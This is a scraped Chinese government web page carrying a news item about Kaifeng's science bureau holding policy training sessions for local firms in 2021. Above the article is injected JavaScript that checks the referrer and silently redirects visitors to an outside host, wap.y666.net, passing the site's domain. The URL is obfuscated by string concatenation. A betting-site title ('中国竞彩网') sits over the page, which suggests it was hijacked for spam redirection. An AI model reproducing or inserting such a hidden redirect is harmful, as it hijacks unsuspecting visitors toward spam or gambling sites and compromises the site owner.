var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

开封市科技局组织开展高质量发展科技创新政策宣讲活动


发布日期:2021-10-09 15:33来源:开封市科学技术局 阅读次数:

  科技政策是助力科技创新事业的主要抓手,政策作用落地效能发挥的重要环节就在于政策的前期宣讲,针对性、有效性地扩大科技政策受众,能发挥科技企业的主观能动性,促进科技政策高质量落实。

  开封市科技局将政策宣讲同高质量发展科技创新综合绩效考核评价工作相结合,于9月27-29日,在全市十个县(区)分时间段、分区域、分专场组织开展开封市高质量发展科技创新政策宣讲培训活动。本次培训邀请7位省内知名专家,巡回组织召开6场科技创新政策宣讲培训会,受训企业达到400余家。通过宣讲培训活动,使企业掌握了研发费用归集、创新型企业申报、技术合同认定、研发活动统计报表填报等方面的最新政策、申报流程和注意事项,了解了最新科技惠企政策,极大地激发了企业的创新动力,为完成2021年度开封市高质量发展综合绩效考核评价工作任务打下了坚实的基础。

  本次宣讲活动将“我为群众办实事”实践活动推深做实,通过政策宣讲,引导企业用足用好科技创新政策各类“优惠券”,帮助企业进一步了解政策从而更进一步用好政策,促使科技政策发挥实用效能,解决了开封市各类企业发展的痛点难点,加快了科技企业梯次培育,更好地助力企业创新发展。